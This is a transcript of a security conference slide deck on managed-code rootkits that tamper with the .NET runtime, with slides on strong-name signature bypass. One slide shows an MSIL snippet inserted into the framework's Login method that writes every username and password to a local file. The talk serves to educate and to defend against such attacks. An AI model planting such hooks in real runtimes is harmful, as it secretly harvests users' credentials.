How well do you know your runtime
-
Upload
rob-gillen -
Category
Technology
-
view
416 -
download
3
description
Transcript of How well do you know your runtime
![Page 1: How well do you know your runtime](https://reader036.fdocuments.in/reader036/viewer/2022082804/5490419bb4795963488b4d62/html5/thumbnails/1.jpg)
How Well Do You Know Your Runtime?
Rob Gillen
@argodev
This work is licensed under a Creative Commons Attribution 3.0 License.
![Page 2: How well do you know your runtime](https://reader036.fdocuments.in/reader036/viewer/2022082804/5490419bb4795963488b4d62/html5/thumbnails/2.jpg)
Don’t Be Stupid
The following presentation describes real attacks on real systems. Please note that most of the attacks described would be considered ILLEGAL if attempted on machines that you do not have explicit permission to test and attack. I assume no responsibility for any actions you perform based on the content of this presentation or subsequent conversations.
Please remember this basic guideline: With knowledge comes responsibility.
![Page 3: How well do you know your runtime](https://reader036.fdocuments.in/reader036/viewer/2022082804/5490419bb4795963488b4d62/html5/thumbnails/3.jpg)
Disclaimer
The content of this presentation represents my personal views and thoughts at the present time. This content is not endorsed by, or representative in any way of my employer nor is it intended to be a view into my work or a reflection on the type of work that I or my group performs. It is simply a hobby and personal interest and should be considered as such.
![Page 4: How well do you know your runtime](https://reader036.fdocuments.in/reader036/viewer/2022082804/5490419bb4795963488b4d62/html5/thumbnails/4.jpg)
Credits
Many ideas for this talk are derived from “Managed Code Rootkits: Hooking Into Runtime Environments”, Erez Metula, Syngress, 2011
Some ideas are from “Gray Hat Python”, Justin Seitz, No Starch, 2009
Other Ideas are from colleagues far
Few ideas are my own
![Page 5: How well do you know your runtime](https://reader036.fdocuments.in/reader036/viewer/2022082804/5490419bb4795963488b4d62/html5/thumbnails/5.jpg)
root·kit/ˈr otˌkit/o͞
noun: rootkit; plural noun: rootkits
a set of software tools that enable an unauthorized user to gain control of a computer system without being detected.
http://google.com/search?q=define+rootkit
![Page 6: How well do you know your runtime](https://reader036.fdocuments.in/reader036/viewer/2022082804/5490419bb4795963488b4d62/html5/thumbnails/6.jpg)
A rootkit is a stealthy type of software, typically malicious, designed to hide the existence of certain processes or programs from normal methods of detection and enable continued privileged access to a computer. The term rootkit is a concatenation of "root" (the traditional name of the privileged account on Unix operating systems) and the word "kit" (which refers to the software components that implement the tool). The term "rootkit" has negative connotations through its association with malware.
http://en.wikipedia.org/wiki/Rootkit
![Page 7: How well do you know your runtime](https://reader036.fdocuments.in/reader036/viewer/2022082804/5490419bb4795963488b4d62/html5/thumbnails/7.jpg)
Terminology
• Runtime Environment/Application-Level Virtual Machine• Java JVM• .NET Framework aka Common Language Runtime (CLR)
• Android Dalvik
• Intermediate Language• MS IL
• Managed Code• Java• C#, VB.NET, F#, etc.
![Page 8: How well do you know your runtime](https://reader036.fdocuments.in/reader036/viewer/2022082804/5490419bb4795963488b4d62/html5/thumbnails/8.jpg)
http://www.everbot.com/c-programming-language/
![Page 9: How well do you know your runtime](https://reader036.fdocuments.in/reader036/viewer/2022082804/5490419bb4795963488b4d62/html5/thumbnails/9.jpg)
http://http://java.sampleexamples.com/java-is-best-suited-for-internet/
![Page 10: How well do you know your runtime](https://reader036.fdocuments.in/reader036/viewer/2022082804/5490419bb4795963488b4d62/html5/thumbnails/10.jpg)
DEMO: Modifying Default Behavior
![Page 11: How well do you know your runtime](https://reader036.fdocuments.in/reader036/viewer/2022082804/5490419bb4795963488b4d62/html5/thumbnails/11.jpg)
.method public hidebysig static bool Login(string userName, string password, [opt] bool persistCookie) cil managed
{
.param [3] = bool(false)
// Code size 26 (0x1a)
.maxstack 2
.locals init (bool V_0)
IL_0000: call class WebMatrix.WebData.ExtendedMembershipProvider WebMatrix.WebData.WebSecurity::VerifyProvider()
IL_0005: pop
IL_0006: ldarg.0
IL_0007: ldarg.1
IL_0008: call bool [System.Web]System.Web.Security.Membership::ValidateUser(string, string)
IL_000d: stloc.0
IL_000e: ldloc.0
IL_000f: brfalse.s IL_0018
IL_0011: ldarg.0
IL_0012: ldarg.2
IL_0013: call void [System.Web]System.Web.Security.FormsAuthentication::SetAuthCookie(string, bool)
IL_0018: ldloc.0
IL_0019: ret
} // end of method WebSecurity::Login
![Page 12: How well do you know your runtime](https://reader036.fdocuments.in/reader036/viewer/2022082804/5490419bb4795963488b4d62/html5/thumbnails/12.jpg)
// OK, let's be a little evil
IL_00XX: nop
IL_00XX: ldstr "C:\\Users\\Public\\mylog.txt"
IL_00XX: ldarg.0 // get the username
IL_00XX: ldstr ","
IL_00XX: ldarg.1 // get the password
IL_00XX: ldstr "\r\n"
// set the data (concatenate the pervious strings)
IL_00XX: call string System.String::Concat(string,string,string,string)
// write the data
IL_00XX: call void [mscorlib]System.IO.File::AppendAllText(string, string)
IL_00XX: nop
![Page 13: How well do you know your runtime](https://reader036.fdocuments.in/reader036/viewer/2022082804/5490419bb4795963488b4d62/html5/thumbnails/13.jpg)
Protection
• Local Runtime?• Signature Checking?
![Page 14: How well do you know your runtime](https://reader036.fdocuments.in/reader036/viewer/2022082804/5490419bb4795963488b4d62/html5/thumbnails/14.jpg)
Progress?
Starting with the .NET Framework 3.5 Service Pack 1, strong-name signatures are not validated when an assembly is loaded into a full-trust application domain, such as the default application domain for the MyComputer zone. This is referred to as the strong-name bypass feature. In a full-trust environment, demands for StrongNameIdentityPermission always succeed for signed, full-trust assemblies, regardless of their signature. The strong-name bypass feature avoids the unnecessary overhead of strong-name signature verification of full-trust assemblies in this situation, allowing the assemblies to load faster.
http://msdn.microsoft.com/en-us/library/xwb8f617%28v=vs.110%29.aspx
![Page 15: How well do you know your runtime](https://reader036.fdocuments.in/reader036/viewer/2022082804/5490419bb4795963488b4d62/html5/thumbnails/15.jpg)
Mixed Success
<configuration> <runtime> <bypassTrustedAppStrongNames enabled="false" /> </runtime> </configuration>
![Page 16: How well do you know your runtime](https://reader036.fdocuments.in/reader036/viewer/2022082804/5490419bb4795963488b4d62/html5/thumbnails/16.jpg)
o_O.method assembly hidebysig static class System.Reflection.RuntimeAssembly
InternalLoadAssemblyName(
class System.Reflection.AssemblyName assemblyRef,
class System.Security.Policy.Evidence assemblySecurity,
class System.Reflection.RuntimeAssembly reqAssembly,
valuetype System.Threading.StackCrawlMark& stackMark,
native int pPrivHostBinder,
bool throwOnFileNotFound,
bool forIntrospection,
bool suppressSecurityChecks) cil managed
{
method logic…